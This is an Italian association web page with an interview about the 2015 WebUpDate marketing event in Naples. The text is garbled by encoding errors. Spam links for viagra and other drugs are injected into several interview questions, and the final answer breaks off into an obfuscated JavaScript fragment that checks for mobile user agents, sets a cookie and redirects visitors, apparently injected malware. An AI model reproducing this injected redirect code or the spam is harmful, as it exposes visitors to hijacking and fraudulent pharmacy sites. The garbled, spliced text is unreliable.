28 Marzo WebUpDate intervista all'organizzatore dell'evento, Alessandro MazzA?.

CONDIVIDI SUI SOCIAL

2 febbraio 2015 | associazione-tp associazione-tp

28 Marzo WebUpDate intervista all’organizzatore dell’evento, Alessandro MazzA?.

slide_webupdate-01

a cura di Giovanni Carbone

Il 28 marzo a Napoli avrAi?? luogo la sesta edizione del WebUpDate, evento nato da un’idea di Alessandro MazzA?, Consulente, Formatore e CEO di QADRA.NET, agenzia di Marketing & Comunicazione con sede a Napoli e a Milano. Grazie all’iniziativa, che si terrAi?? presso la sala Newton della CittAi?? della Scienza a partire dalle ore 9, la cittAi?? partenopea diventerAi?? protagonista dell’innovazione, fornendo un’importante occasione di confronto e aggiornamento per aziende, professionisti, studenti e appassionati di marketing e web.
Il mercato A? in costante evoluzione ed aumenta la necessitAi?? per gli operatori del settore di accrescere le proprie competenze in merito a tutte le possibilitAi?? che il web puA? donare, creando nuovi spazi di socialitAi??, tramite i quali le aziende possono rafforzare le relazioni per incrementare il proprio business.

Nel Centro Congressi, con la sua capienza complessiva di circa 2000 posti, molti saranno gli interventi di esperti provenienti da diversi ambienti e con diverse professionalitAi??, fornendo una grande possibilitAi?? di condivisione e confronto d’idee. Inoltre durante la giornata ci sarAi?? la possibilitAi?? di partecipare a tre workshops.

L’associazione TP A? partner ufficiale di WebUpDate. Per celebrare questo sodalizio abbiamo deciso di intervistare l’organizzatore dell’evento, Alessandro MazzA?.

– WebUpDate arriva al suo sesto anniversario. Com’A? cambiata in questi anni l’attenzione verso Web e Digital da parte del pubblico, delle aziende e delle istituzioni? purchase viagra online
Per fortuna lai??i??attenzione in generale verso il web ed il digitale sta lentamente crescendo. Il trend di crescita A? positivo, nel senso che ogni anno facciamo passi in avanti e questo ci lascia ben sperare per il futuro anche se siamo indietro rispetto a tantissime altre realtAi??, non solo in Europa ma nel mondo. Le istituzioni sono indietro anni luce cosAi?? come la maggior parte delle aziende italiane. Basti pensare che in molte non hanno un sito web o ne hanno uno realizzato piA? di cinque anni fa (quindi con una tecnologia ormai preistorica). Quelli che sono al passo con i tempi sono i giovani. Non mi riferisco solo ai nativi digitali.

– Com’A? il vostro rapporto con le universitAi?? e il mondo giovanile? Ha mai seguito da vicino il lavoro di un tesista e su quale tema?
Le UniversitAi??, per loro stessa natura, sono poco vicine alle tematiche del web e del digitale. Ci sono perA? per fortuna alcuni (pochi purtroppo) casi molto interessanti in Italia. Una fetta molto cospicua del pubblico del WebUpDate A? composta proprio da laureandi e neolaureati, ovvero proprio da quelle persone che sentono forte lai??i??esigenza di aggiornarsi, di essere al passo con i tempi. A? per questo che nella mia attivitAi?? di formatore, nei miei corsi, piA? del 90% degli iscritti sono giovani. A? compito di chi fa il mio lavoro sopperire ad una carenza che lai??i??UniversitAi??, fin quando non si aggiornerAi?? veramente nei programmi e nei docenti, non potrAi?? soddisfare. Non ho mai seguito un tesista.

– Cosa consiglierebbe a un giovane che si avvicina all’universo del Web? Buy Buy Buy Cheap http://www.ashleekim.com/buy-vermox-online-in-ireland/
La prima cosa che consiglierei A? di non improvvisare ma di studiare, osservare, cercare di capire le dinamiche alla base del marketing e della comunicazione digitale. Serve una solida formazione e tanta pratica per poter gestire un progetto di web marketing. Oggi invece si assiste ad una fortissima e dilagante ai???improvvisazioneai??? da parte di persone che, con pochissima esperienza sul campo e con scarsa formazione, si presentano sul mercato come competitors delle vere agenzie. In questo modo danneggiano loro stessi e rovinano il mercato.

cheap nolvadex Viagra Sublingual buy vermox generic name Buy – Oltre ai workshop A? prevista la possibilitAi?? di stage formativi presso aziende o agenzie? Se sAi??, dove e quando? http://www.rebifix.com.br/uncategorized/glucophage-treatment-infertility/ bentyl order buy cheap fildena order apcalis
Come fondatore di QADRA.NET, agenzia di web marketing, abbiamo negli anni avuto molti stagisti. Il WebUpDate essendo un evento organizzato dalla mia agenzia non ha un suo staff e quindi non A? prevista alcuna possibilitAi?? di stage formativi presso aziende o agenzia.

– Se potesse, come titolerebbe il prossimo numero dellai??i??Economist?
Mi piacerebbe poter leggere un titolo nel quale si parla dellai??i??Italia ed in particolare del Sud Italia come ai???motore della rivoluzione digitaleai???, come ai???ispiratore di innovazione digitaleai??? dellai??i??Europaai??i?? a(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}





Newsletter

ASSOCIAZIONE TP TP Associazione Italiana Pubblicitari Professionisti
Via della Commenda n.41 - 20122 Milano, Italy
tel. 02 655841 - fax 02 48028247
www.associazione-tp.it tp@associazione-tp.it
P. IVA e C.F. 04694510159

Privacy - RSS Feed © 2014 TP WEB TEAM